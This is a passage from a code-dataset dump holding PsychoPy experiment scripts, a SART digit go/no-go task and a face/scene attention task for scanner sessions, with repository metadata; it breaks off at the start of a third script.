"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Wed May 29 13:24:25 2013\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division #so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, gui\nfrom psychopy.constants import * #things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle, seed\nimport os #handy system and path functions\n\n#store info about the experiment session\nexpName='None'#from the Builder filename that created this script\nexpInfo={'participant':'', 'session':'f'}\ndlg=gui.DlgFromDict(dictionary=expInfo,title=expName)\nif dlg.OK==False: core.quit() #user pressed cancel\nexpInfo['date']=data.getDateStr()#add a simple timestamp\nexpInfo['expName']=expName\n#setup files for saving\nif not os.path.isdir('data'):\n os.makedirs('data') #if this fails (e.g. permissions) we will get error\nfilename='data' + os.path.sep + '%s_%s_%s' %(expInfo['participant'], expInfo['session'], expInfo['date'])\nlogFile=logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file\n\n#an ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=False, saveWideText=True,\n dataFileName=filename)\ndatFile=open('data' + os.path.sep + '%s_%s_SART.txt' %(expInfo['participant'], expInfo['session']),'a')\ndatFile.write('Trial\\tDigit\\tRunType\\tResponse\\tGoHits\\tNogoHits\\tCommissions\\tOmissions\\tstimOnset\\tRT\\n')\n\n#setup the Window\nwin = visual.Window(size=(1920, 1080), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor=u'testMonitor', color=u'white', colorSpace=u'rgb')\n\n#Initialise components for Routine \"scan\"\nscanClock=core.Clock()\nwait=visual.TextStim(win=win, ori=0, name='wait',\n text='Please respond to the bolded cue after every digit except \"3\"\\n\\nWaiting for scanner...',\n font=u'Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color=u'black', colorSpace=u'rgb', opacity=1,\n depth=0.0)\n\n#Initialise components for Routine \"trial\"\ntrialClock=core.Clock()\ndigit=visual.TextStim(win=win, ori=0, name='digit',\n text='nonsense',\n font=u'Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color=u'black', colorSpace=u'rgb', opacity=1,\n depth=0.0)\nmask1=visual.PatchStim(win=win, name='mask1',units=u'pix',\n tex=u'mask.png', mask=None,\n ori=0, pos=[0, 0], size=[256,256], sf=None, phase=0.0,\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=False, depth=-1.0)\nresponse_cue=visual.PatchStim(win=win, name='response_cue',units=u'pix',\n tex=u'resp_cue.png', mask=None,\n ori=0, pos=[0, 0], size=[256,256], sf=None, phase=0.0,\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=False, depth=-2.0)\nmask2=visual.PatchStim(win=win, name='mask2',units=u'pix',\n tex=u'mask.png', mask=None,\n ori=0, pos=[0, 0], size=[256,256], sf=None, phase=0.0,\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=False, depth=-3.0)\nfixation=visual.PatchStim(win=win, name='fixation',units=u'pix',\n tex=u'fixation.png', mask=None,\n ori=0, pos=[0, 0], size=[256,256], sf=None, phase=0.0,\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=False, depth=-4.0)\n\n# Create some handy timers\nglobalClock=core.Clock() #to track the time since experiment started\nroutineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine \nbegExpClock=core.Clock() #to track the time since the actual paradigm started (after the scanner screen)\n\n#------Prepare to start Routine\"scan\"-------\nt=0; scanClock.reset() #clock \nframeN=-1\n#update component parameters for each repeat\nscan_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\nscan_resp.status=NOT_STARTED\n#keep track of which components have finished\nscanComponents=[]\nscanComponents.append(wait)\nscanComponents.append(scan_resp)\nfor thisComponent in scanComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n#-------Start Routine \"scan\"-------\ncontinueRoutine=True\nwhile continueRoutine:\n #get current time\n t=scanClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*wait* updates\n if t>=0.0 and wait.status==NOT_STARTED:\n #keep track of start time/frame for later\n wait.tStart=t#underestimates by a little under one frame\n wait.frameNStart=frameN#exact frame index\n wait.setAutoDraw(True)\n \n #*scan_resp* updates\n if t>=0.0 and scan_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n scan_resp.tStart=t#underestimates by a little under one frame\n scan_resp.frameNStart=frameN#exact frame index\n scan_resp.status=STARTED\n #keyboard checking is just starting\n scan_resp.clock.reset() # now t=0\n event.clearEvents()\n if scan_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['+', 'num_add', 'return'])\n if len(theseKeys)>0:#at least one key was pressed\n scan_resp.keys=theseKeys[-1]#just the last key pressed\n scan_resp.rt = scan_resp.clock.getTime()\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in scanComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n\n#End of Routine \"scan\"\nfor thisComponent in scanComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n\n#set up handler to look after randomisation of conditions etc\ntrialNum=25\nset=[1,2,3,4,5,6,7,8,9]\nif expInfo['session']=='f': #fixed\n digits=set*trialNum\nelif expInfo['session']=='r': #random\n digits=[]\n for i in range(trialNum):\n seed(i)\n shuffle(set)\n digits.extend(set)\n for i in range(len(digits)): #makes sure that there are never two consecutive 'nogo' trials\n if digits[i]==3 and digits[i-1]==3:\n temp=digits[i+1]\n digits[i]=temp\n digits[i+1]=3\nmyarray = []\nfor i in range(len(digits)):\n myarray.append({'digits': digits[i]}) #puts data into an array of dictionaries that the TrialHandler function will accept\ntrials=data.TrialHandler(nReps=1, method=u'sequential', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='trials')\nthisExp.addLoop(trials)#add the loop to the experiment\nthisTrial=trials.trialList[0]#so we can initialise stimuli with some values\n#abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\nif thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\nbegExpClock.reset()\nfor thisTrial in trials:\n currentLoop = trials\n #abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n #------Prepare to start Routine\"trial\"-------\n t=0; trialClock.reset() #clock \n frameN=-1\n routineTimer.add(1.439000)\n #update component parameters for each repeat\n digit.setText(digits)\n key_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\n key_resp.status=NOT_STARTED\n #keep track of which components have finished\n trialComponents=[]\n trialComponents.append(digit)\n trialComponents.append(mask1)\n trialComponents.append(response_cue)\n trialComponents.append(mask2)\n trialComponents.append(fixation)\n trialComponents.append(key_resp)\n for thisComponent in trialComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"trial\"-------\n continueRoutine=True\n while continueRoutine and routineTimer.getTime()>0:\n #get current time\n t=trialClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*digit* updates\n if t>=0.0 and digit.status==NOT_STARTED:\n #keep track of start time/frame for later\n digit.tStart=t#underestimates by a little under one frame\n digit.frameNStart=frameN#exact frame index\n digit.setAutoDraw(True)\n stimOn=begExpClock.getTime()\n elif digit.status==STARTED and t>=(0.0+0.313):\n digit.setAutoDraw(False)\n \n #*mask1* updates\n if t>=0.313 and mask1.status==NOT_STARTED:\n #keep track of start time/frame for later\n mask1.tStart=t#underestimates by a little under one frame\n mask1.frameNStart=frameN#exact frame index\n mask1.setAutoDraw(True)\n elif mask1.status==STARTED and t>=(0.313+0.125):\n mask1.setAutoDraw(False)\n \n #*response_cue* updates\n if t>=0.438 and response_cue.status==NOT_STARTED:\n #keep track of start time/frame for later\n response_cue.tStart=t#underestimates by a little under one frame\n response_cue.frameNStart=frameN#exact frame index\n response_cue.setAutoDraw(True)\n elif response_cue.status==STARTED and t>=(0.438+0.063):\n response_cue.setAutoDraw(False)\n \n #*mask2* updates\n if t>=0.501 and mask2.status==NOT_STARTED:\n #keep track of start time/frame for later\n mask2.tStart=t#underestimates by a little under one frame\n mask2.frameNStart=frameN#exact frame index\n mask2.setAutoDraw(True)\n elif mask2.status==STARTED and t>=(0.501+0.375):\n mask2.setAutoDraw(False)\n \n #*fixation* updates\n if t>=0.876 and fixation.status==NOT_STARTED:\n #keep track of start time/frame for later\n fixation.tStart=t#underestimates by a little under one frame\n fixation.frameNStart=frameN#exact frame index\n fixation.setAutoDraw(True)\n elif fixation.status==STARTED and t>=(0.876+0.563):\n fixation.setAutoDraw(False)\n \n #*key_resp* updates\n if t>=0 and key_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n key_resp.tStart=t#underestimates by a little under one frame\n key_resp.frameNStart=frameN#exact frame index\n key_resp.status=STARTED\n #keyboard checking is just starting\n key_resp.clock.reset() # now t=0\n event.clearEvents()\n elif key_resp.status==STARTED and t>=(0+1.439):\n key_resp.status=STOPPED\n if key_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['1'])\n if len(theseKeys)>0:#at least one key was pressed\n key_resp.keys=theseKeys[-1]#just the last key pressed\n key_resp.rt = key_resp.clock.getTime()\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"trial\"\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n #check responses\n if len(key_resp.keys)==0: #No response was made\n key_resp.keys=None\n #store data for trials (TrialHandler)\n trials.addData('key_resp.keys',key_resp.keys)\n if key_resp.keys != None:#we had a response\n trials.addData('key_resp.rt',key_resp.rt)\n thisExp.nextEntry()\n\n#completed 1 repeats of 'trials'\n if digits!=3 and key_resp.keys=='1':\n [Ghit,Nhit,CE,OE]=[1,0,0,0]\n elif digits==3 and key_resp.keys==None:\n [Ghit,Nhit,CE,OE]=[0,1,0,0]\n elif digits==3 and key_resp.keys=='1':\n [Ghit,Nhit,CE,OE]=[0,0,1,0]\n elif digits!=3 and key_resp.keys==None:\n [Ghit,Nhit,CE,OE]=[0,0,0,1]\n datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n'%(trials.thisTrialN+1,digits,expInfo['session'],key_resp.keys,Ghit,Nhit,CE,OE,stimOn,key_resp.rt))\n\n#save data for this loop\n#trials.saveAsPickle(filename+'trials', fileCollisionMethod='rename')\n\n#Shutting down:\nwin.close()\ncore.quit()\n"
},
{
"alpha_fraction": 0.6016196012496948,
"alphanum_fraction": 0.6176673769950867,
"avg_line_length": 46.99052047729492,
"blob_id": "b4bd0a998619963bfeb26ab98ac193f0c429ab5c",
"content_id": "6a0a86c11baddfa09d0b3cd046cca401f3c281a8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 20252,
"license_type": "no_license",
"max_line_length": 265,
"num_lines": 422,
"path": "/GML_sceneFirst.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.74.00), Mon Jul 23 18:00:53 2012\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division #so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, gui\nfrom psychopy.constants import * #things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle\nfrom random import seed, shuffle\nimport os #handy system and path functions\n#import GML_retrieval\n\n#store info about the experiment session\nexpName='ArimIdea'#from the Builder filename that created this script\nexpInfo={'participant':'', 'session':'001'}\ndlg=gui.DlgFromDict(dictionary=expInfo,title=expName)\nif dlg.OK==False: core.quit() #user pressed cancel\nexpInfo['date']=data.getDateStr()#add a simple timestamp\nexpInfo['expName']=expName\n#setup files for saving\nif not os.path.isdir('data'):\n os.makedirs('data') #if this fails (e.g. permissions) we will get error\nfilename='data' + os.path.sep + '%s_%s' %(expInfo['participant'], expInfo['date'])\nlogFile=logging.LogFile(filename+'.log', level=logging.EXP)\nlogging.console.setLevel(logging.WARNING)#this outputs to the screen, not a file\n\n\n#an ExperimentHandler isn't essential but helps with data saving\nthisExp = data.ExperimentHandler(name=expName, version='',\n extraInfo=expInfo, runtimeInfo=None,\n originPath=None,\n savePickle=True, saveWideText=True,\n dataFileName=filename)\ndatFile=open('data' + os.path.sep + '%s_%s.txt' %(expInfo['participant'], expInfo['date']),'a')\ndatFile.write('Trial\\tRun\\tFace\\tScene\\tAttended\\tstimOnset\\tRT\\n')\n\nrunNum=1\ntotRuns=6\ntotStimNum=120\nsceneAttend=[1,3,5]\nfaceAttend=[2,4,6]\nwhile runNum<=totRuns:\n if np.any(np.array(faceAttend) == runNum):\n instr_text='FACES'\n instr_text2='face'\n elif np.any(np.array(sceneAttend) == runNum):\n instr_text='SCENES'\n instr_text2='scene'\n# datFile=open('data' + os.path.sep + '%s_%s.txt' %(expInfo['participant'], expInfo['date']),'a')\n# datFile.write('Trial\\tFace\\tScene\\tstimOnset\\tRT\\n')\n \n #setup the Window\n win = visual.Window(size=(1920, 1080), fullscr=True, screen=0, allowGUI=False, allowStencil=False,\n monitor='testMonitor', color='black', colorSpace='rgb')\n \n #Initialise components for Routine \"instr\"\n instrClock=core.Clock()\n text=visual.TextStim(win=win, ori=0, name='text',\n text='Remember %s\\n\\nPress spacebar when you first distinguish a %s. Press enter to begin.' % (instr_text,instr_text2),\n font='Arial',\n pos=[0, 0], height=0.1,wrapWidth=None,\n color='white', colorSpace='rgb', opacity=1,\n depth=0.0)\n begExpClock=core.Clock()\n #Initialise components for Routine \"fixScr\"\n fixScrClock=core.Clock()\n \n fixation=visual.ImageStim(win=win, name='fixation',\n image=u'Stim' + os.path.sep + 'fixation.jpg', mask=None, units=u'pix',\n ori=0, pos=[0, 0], size=[256, 256],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-1.0)\n \n #Initialise components for Routine \"trial\"\n RTclock=core.Clock()\n trialClock=core.Clock()\n image1=visual.ImageStim(win=win, name='image1',units=u'pix', \n image='sin', mask=None,\n ori=0, pos=[0, 0], size=[225, 338],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=0.0)\n image2=visual.ImageStim(win=win, name='image2',units=u'pix', \n image='sin', mask=None,\n ori=0, pos=[0, 0], size=[225, 338],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-1.0)\n imageF=visual.ImageStim(win=win, name='imageF',units=u'pix',\n image=u'Stim' + os.path.sep + 'fixation.jpg', mask=None,\n ori=0, pos=[0, 0], size=[256, 256],\n color=[1,1,1], colorSpace=u'rgb', opacity=1,\n texRes=128, interpolate=True, depth=-1.0)\n responseClock=core.Clock()\n # Create some handy timers\n globalClock=core.Clock() #to track the time since experiment started\n routineTimer=core.CountdownTimer() #to track time remaining of each (non-slip) routine \n \n #------Prepare to start Routine\"instr\"-------\n t=0; instrClock.reset() #clock \n frameN=-1\n #update component parameters for each repeat\n key_resp = event.BuilderKeyResponse() #create an object of type KeyResponse\n key_resp.status=NOT_STARTED\n #keep track of which components have finished\n instrComponents=[]\n instrComponents.append(text)\n instrComponents.append(key_resp)\n for thisComponent in instrComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"instr\"-------\n continueRoutine=True\n while continueRoutine:\n #get current time\n t=instrClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*text* updates\n if t>=0.0 and text.status==NOT_STARTED:\n #keep track of start time/frame for later\n text.tStart=t#underestimates by a little under one frame\n text.frameNStart=frameN#exact frame index\n text.setAutoDraw(True)\n \n #*key_resp* updates\n if t>=0.0 and key_resp.status==NOT_STARTED:\n #keep track of start time/frame for later\n key_resp.tStart=t#underestimates by a little under one frame\n key_resp.frameNStart=frameN#exact frame index\n key_resp.status=STARTED\n #keyboard checking is just starting\n key_resp.clock.reset() # now t=0\n event.clearEvents()\n if key_resp.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['return'])\n if len(theseKeys)>0:#at least one key was pressed\n key_resp.keys=theseKeys[-1]#just the last key pressed\n key_resp.rt = key_resp.clock.getTime()\n #abort routine on response\n continueRoutine=False\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in instrComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"instr\"\n for thisComponent in instrComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n \n #***set up handler to look after randomisation of conditions etc\n stimLists=np.loadtxt('conditions3.txt',dtype='str',delimiter='\\t') #loads info from conditions file (which should be a .txt not an .xlsx)\n fixes=stimLists[:,2] #chooses column for each category of data\n faceList=stimLists[:,0]\n sceneList=stimLists[:,1]\n seed(int(expInfo['participant'])+65) #seeds randomization based on participant number\n shuffle(faceList) #shuffles/randomizes list based on above seed\n seed(int(expInfo['participant'])+43) #seeds randomization based on participant number\n shuffle(sceneList)\n runLength=(totStimNum/totRuns)\n if runNum==1:\n faces=faceList[0:runLength] #picks the first 120 from the randomized list of total faces/scenes\n scenes=sceneList[0:runLength]\n elif runNum>1:\n faces=faceList[((runNum-1)*runLength):(runLength*runNum)] #picks the first 120 from the randomized list of total faces/scenes\n scenes=sceneList[((runNum-1)*runLength):(runLength*runNum)]\n myarray = []\n for i in range(len(faces)):\n myarray.append({'faces': faces[i], 'scenes': scenes[i], 'fixes': fixes[i]}) #puts data into an array of dictionaries that the TrialHandler function will accept\n trials=data.TrialHandler(nReps=1, method='sequential', \n extraInfo=expInfo, originPath=None,\n trialList=myarray,\n seed=None, name='trials')\n thisExp.addLoop(trials)#add the loop to the experiment\n thisTrial=trials.trialList[0]#so we can initialise stimuli with some values\n #abbreviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n counter = 0\n x = 20*np.array(range(1,180))\n begExpClock.reset()\n for thisTrial in trials:\n currentLoop = trials\n #abbrieviate parameter names if possible (e.g. rgb=thisTrial.rgb)\n if thisTrial!=None:\n for paramName in thisTrial.keys():\n exec(paramName+'=thisTrial.'+paramName)\n \n #------Prepare to start Routine\"fixScr\"-------\n t=0; fixScrClock.reset() #clock \n frameN=-1\n #update component parameters for each repeat\n durr = randint(3,8)\n image1.setImage(faces)\n image2.setImage(scenes)\n #keep track of which components have finished\n fixScrComponents=[]\n fixScrComponents.append(fixation)\n for thisComponent in fixScrComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"fixScr\"-------\n continueRoutine=True\n while continueRoutine:\n #get current time\n t=fixScrClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n \n #*fixation* updates\n if t>=0.0 and fixation.status==NOT_STARTED:\n #keep track of start time/frame for later\n fixation.tStart=t#underestimates by a little under one frame\n fixation.frameNStart=frameN#exact frame index\n fixation.setAutoDraw(True)\n elif fixation.status==STARTED and t>=(0.0+durr):\n fixation.setAutoDraw(False)\n fixOff=begExpClock.getTime()\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in fixScrComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"fixScr\"\n for thisComponent in fixScrComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n \n RTclock.reset()\n #set up handler to look after randomisation of conditions etc\n trials_2=data.TrialHandler(nReps=20, method=u'random', \n extraInfo=expInfo, originPath=None,\n trialList=[None],\n seed=None, name='trials_2')\n thisExp.addLoop(trials_2)#add the loop to the experiment\n thisTrial_2=trials_2.trialList[0]#so we can initialise stimuli with some values\n #abbreviate parameter names if possible (e.g. rgb=thisTrial_2.rgb)\n if thisTrial_2!=None:\n for paramName in thisTrial_2.keys():\n exec(paramName+'=thisTrial_2.'+paramName)\n responseClock.reset()\n trialResponseTime='NaN'\n trialResponseKey=[]\n for thisTrial_2 in trials_2:\n currentLoop = trials_2\n #abbrieviate parameter names if possible (e.g. rgb=thisTrial_2.rgb)\n if thisTrial_2!=None:\n for paramName in thisTrial_2.keys():\n exec(paramName+'=thisTrial_2.'+paramName)\n \n #------Prepare to start Routine\"trial\"-------\n t=0; trialClock.reset() #clock \n frameN=-1\n counter= counter + 1 #sets up a counter for the total number of repetitions that goes through the trials_2 loop (counter does not reset when a new trials_2 loop starts)\n #update component parameters for each repeat\n key_resp_2 = event.BuilderKeyResponse() #create an object of type KeyResponse\n key_resp_2.status=NOT_STARTED\n #keep track of which components have finished\n trialComponents=[]\n trialComponents.append(key_resp_2)\n trialComponents.append(image1)\n trialComponents.append(image2)\n for thisComponent in trialComponents:\n if hasattr(thisComponent,'status'): thisComponent.status = NOT_STARTED\n #-------Start Routine \"trial\"-------\n continueRoutine=True\n while continueRoutine:\n #get current time\n t=trialClock.getTime()\n frameN=frameN+1#number of completed frames (so 0 in first frame)\n #update/draw components on each frame\n \n #*key_resp_2* updates\n if t>=fixation.status==FINISHED and key_resp_2.status==NOT_STARTED:\n #keep track of start time/frame for later\n key_resp_2.tStart=t#underestimates by a little under one frame\n key_resp_2.frameNStart=frameN#exact frame index\n key_resp_2.status=STARTED\n #keyboard checking is just starting\n key_resp_2.clock.reset() # now t=0\n # event.clearEvents()\n elif key_resp_2.status==STARTED and t>=(fixation.status==FINISHED+2.3):\n key_resp_2.status=STOPPED\n if key_resp_2.status==STARTED:#only update if being drawn\n theseKeys = event.getKeys(keyList=['space'])\n if len(theseKeys)>0:#at least one key was pressed\n key_resp_2.keys.extend(theseKeys)#storing all keys\n key_resp_2.rt.append(key_resp_2.clock.getTime())\n key_resp.keys=theseKeys[0]#just the first key pressed\n # key_resp_2.rt = key_resp_2.clock.getTime()\n trialResponseTime=RTclock.getTime()\n trialResponseKey=theseKeys[-1]\n \n # this sets it up so that the very last trial in trials_2 loop is a fixation cross instead of one of the images (because there is a lag when moving on to the next routine and we don't want the last image being displayed for the duration of that lag)\n if np.any(np.array(x) == counter):\n imageF.tStart=t#underestimates by a little under one frame\n imageF.frameNStart=frameN#exact frame index\n imageF.setAutoDraw(True)\n elif np.any(np.array(x) != counter):\n imageF.setAutoDraw(False)\n \n #*image1* updates\n if frameN>=0.0 and image1.status==NOT_STARTED:\n if np.any(np.array(x) == counter):\n image1.setAutoDraw(False)\n image1.status=FINISHED\n elif np.any(np.array(x) != counter):\n #keep track of start time/frame for later\n image1.tStart=t#underestimates by a little under one frame\n image1.frameNStart=frameN#exact frame index\n image1.setAutoDraw(True)\n elif image1.status==STARTED and frameN>=3:\n image1.setAutoDraw(False)\n \n #*image2* updates\n if frameN>=3 and image2.status==NOT_STARTED:\n if np.any(np.array(x) == counter):\n image2.setAutoDraw(False)\n image2.status=FINISHED\n elif np.any(np.array(x) != counter):\n #keep track of start time/frame for later\n image2.tStart=t#underestimates by a little under one frame\n image2.frameNStart=frameN#exact frame index\n image2.setAutoDraw(True)\n elif image2.status==STARTED and frameN>=6:\n image2.setAutoDraw(False)\n \n #check if all components have finished\n if not continueRoutine: #a component has requested that we end\n routineTimer.reset() #this is the new t0 for non-slip Routines\n break\n continueRoutine=False#will revert to True if at least one component still running\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"status\") and thisComponent.status!=FINISHED:\n continueRoutine=True; break#at least one component has not yet finished\n \n #check for quit (the [Esc] key)\n if event.getKeys([\"escape\"]):\n core.quit()\n \n #refresh the screen\n if continueRoutine:#don't flip if this routine is over or we'll get a blank screen\n win.flip()\n \n #End of Routine \"trial\"\n for thisComponent in trialComponents:\n if hasattr(thisComponent,\"setAutoDraw\"): thisComponent.setAutoDraw(False)\n \n #check responses\n if len(key_resp_2.keys)==0: #No response was made\n key_resp_2.keys=None\n #store data for trials (TrialHandler)\n trials.addData('key_resp_2.keys',key_resp_2.keys)\n if key_resp_2.keys != None:#we had a response\n trials.addData('key_resp_2.rt',key_resp_2.rt)\n thisExp.nextEntry()\n \n #completed 1 repeats of 'trials'\n if len(trialResponseKey)==0: #No response was made\n trialResponseKey=None\n trials.addData('respKey', trialResponseKey)\n if trialResponseKey != []:#we had a response\n trials.addData('key_resp_rt',trialResponseTime)\n trials.addData('stimOnset',fixOff)\n trials.addData('Run',runNum)\n datFile.write('%s\\t%s\\t%s\\t%s\\t%s\\t%s\\t%s\\n'%(trials.thisTrialN+1,runNum,thisTrial.faces,thisTrial.scenes,instr_text2,fixOff,trialResponseTime))\n \n# datFile.close()\n runNum=runNum+1\n \n #get names of stimulus parameters\n if trials.trialList in ([], [None], None): params=[]\n else: params = trials.trialList[0].keys()\ndatFile.close()\n\n#save data for this loop\n#trials.saveAsPickle(filename+'trials', fileCollisionMethod='rename')\n#trials.saveAsExcel(filename+'.xlsx', sheetName='trials',\n# stimOut=params,\n# dataOut=['n','all_mean','all_std', 'all_raw'])\n\n#if expInfo['session']<4 and thisTrial_2>=2:\n# import GML_retrieval#(expInfo['participant'],(expInfo['session']+1))\n# #GML_retrieval(expInfo['participant'],(expInfo['session']+1))\n#else:\n# win.close() \n# core.quit()\n\n#Shutting down:\nwin.close()\ncore.quit()\n"
},
{
"alpha_fraction": 0.648064911365509,
"alphanum_fraction": 0.66435307264328,
"avg_line_length": 41.32491683959961,
"blob_id": "43fcc7c4d5a16097967017cb4d6c40cb05e92750",
"content_id": "a2f4ebd5116d497a492adff978cdf3f2a80d6958",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 50282,
"license_type": "no_license",
"max_line_length": 271,
"num_lines": 1188,
"path": "/MASC.py",
"repo_name": "maheen/gablab-psychopy-tasks",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\"\"\"\nThis experiment was created using PsychoPy2 Experiment Builder (v1.79.01), Tue May 20 14:28:22 2014\nIf you publish work using this script please cite the relevant PsychoPy publications\n Peirce, JW (2007) PsychoPy - Psychophysics software in Python. Journal of Neuroscience Methods, 162(1-2), 8-13.\n Peirce, JW (2009) Generating stimuli for neuroscience using PsychoPy. Frontiers in Neuroinformatics, 2:10. doi: 10.3389/neuro.11.010.2008\n\"\"\"\n\nfrom __future__ import division # so that 1/3=0.333 instead of 1/3=0\nfrom psychopy import visual, core, data, event, logging, sound, gui\nfrom psychopy.constants import * # things like STARTED, FINISHED\nimport numpy as np # whole numpy lib is available, prepend 'np.'\nfrom numpy import sin, cos, tan, log, log10, pi, average, sqrt, std, deg2rad, rad2deg, linspace, asarray\nfrom numpy.random import random, randint, normal, shuffle\nimport os # handy system and path functions\n\n# Store info about the experiment session\nexpName = 'MASC_skeleton' # from 